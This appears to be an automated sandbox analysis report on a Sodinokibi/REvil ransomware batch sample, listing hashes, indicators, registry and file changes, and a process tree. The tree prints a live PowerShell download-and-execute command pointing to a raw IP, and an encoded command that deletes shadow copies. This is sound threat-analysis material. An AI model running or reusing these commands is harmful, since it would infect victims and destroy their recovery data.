Analysis
-
max time kernel
138s -
max time network
158s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
20-05-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
4f6a42934f34216c6420c04766ae463c.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
4f6a42934f34216c6420c04766ae463c.bat
Resource
win10v200430
General
-
Target
4f6a42934f34216c6420c04766ae463c.bat
-
Size
218B
-
MD5
d7072273beb15bc6b69f0d896b3c3a67
-
SHA1
252dfb1b0b89545b3b431bfde9c616a85236b34d
-
SHA256
172b87c827469bb03962118ed3294645fa65025b5ed9de5157c0f7d5b4ebef27
-
SHA512
cf89e740f3547dde583dec727b45569f2c3a5d072f01420d64f6bb6651e54dd8c3a3bac098f3fa59f61311e99d65fbde23c1d96562274e1943dc9b28ca69cfdc
Malware Config
Extracted
http://185.103.242.78/pastes/4f6a42934f34216c6420c04766ae463c
Extracted
C:\9zc68-read-me.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/045690A9772B7A5B
http://decryptor.cc/045690A9772B7A5B
Signatures
-
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 784 powershell.exe 784 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe 1292 powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Drops file in Program Files directory 16 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\9zc68-read-me.txt powershell.exe File opened for modification \??\c:\program files\EnableCompress.eps powershell.exe File opened for modification \??\c:\program files\StartConfirm.htm powershell.exe File opened for modification \??\c:\program files\SyncGrant.mpeg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\9zc68-read-me.txt powershell.exe File opened for modification \??\c:\program files\OutRegister.potx powershell.exe File opened for modification \??\c:\program files\RedoUpdate.ppt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\9zc68-read-me.txt powershell.exe File created \??\c:\program files (x86)\9zc68-read-me.txt powershell.exe File opened for modification \??\c:\program files\NewResume.vdx powershell.exe File opened for modification \??\c:\program files\SaveOut.scf powershell.exe File opened for modification \??\c:\program files\LimitRestore.xlt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\9zc68-read-me.txt powershell.exe File opened for modification \??\c:\program files\SubmitRestart.emz powershell.exe File opened for modification \??\c:\program files\TraceLock.mov powershell.exe File opened for modification \??\c:\program files\UnpublishGroup.emz powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\t8b2qoc25y881.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1292 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 888 wrote to memory of 1292 888 cmd.exe powershell.exe PID 1292 wrote to memory of 784 1292 powershell.exe powershell.exe PID 1292 wrote to memory of 784 1292 powershell.exe powershell.exe PID 1292 wrote to memory of 784 1292 powershell.exe powershell.exe PID 1292 wrote to memory of 784 1292 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeBackupPrivilege 1788 vssvc.exe Token: SeRestorePrivilege 1788 vssvc.exe Token: SeAuditPrivilege 1788 vssvc.exe Token: SeTakeOwnershipPrivilege 1292 powershell.exe -
Blacklisted process makes network request 178 IoCs
Processes:
powershell.exeflow pid process 1 1292 powershell.exe 5 1292 powershell.exe 7 1292 powershell.exe 9 1292 powershell.exe 11 1292 powershell.exe 12 1292 powershell.exe 14 1292 powershell.exe 16 1292 powershell.exe 18 1292 powershell.exe 19 1292 powershell.exe 21 1292 powershell.exe 22 1292 powershell.exe 24 1292 powershell.exe 25 1292 powershell.exe 27 1292 powershell.exe 28 1292 powershell.exe 30 1292 powershell.exe 31 1292 powershell.exe 33 1292 powershell.exe 35 1292 powershell.exe 36 1292 powershell.exe 38 1292 powershell.exe 40 1292 powershell.exe 42 1292 powershell.exe 44 1292 powershell.exe 46 1292 powershell.exe 47 1292 powershell.exe 49 1292 powershell.exe 50 1292 powershell.exe 52 1292 powershell.exe 53 1292 powershell.exe 56 1292 powershell.exe 58 1292 powershell.exe 60 1292 powershell.exe 62 1292 powershell.exe 63 1292 powershell.exe 65 1292 powershell.exe 66 1292 powershell.exe 68 1292 powershell.exe 69 1292 powershell.exe 71 1292 powershell.exe 73 1292 powershell.exe 75 1292 powershell.exe 77 1292 powershell.exe 79 1292 powershell.exe 80 1292 powershell.exe 82 1292 powershell.exe 84 1292 powershell.exe 86 1292 powershell.exe 87 1292 powershell.exe 89 1292 powershell.exe 92 1292 powershell.exe 93 1292 powershell.exe 95 1292 powershell.exe 96 1292 powershell.exe 98 1292 powershell.exe 99 1292 powershell.exe 101 1292 powershell.exe 103 1292 powershell.exe 105 1292 powershell.exe 106 1292 powershell.exe 108 1292 powershell.exe 110 1292 powershell.exe 111 1292 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\4f6a42934f34216c6420c04766ae463c.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4f6a42934f34216c6420c04766ae463c');Invoke-EPKZRFQOIDB;Start-Sleep -s 10000"2⤵
- Suspicious behavior: EnumeratesProcesses
- Modifies system certificate store
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Drops file in System32 directory
PID:1292 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:784
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1788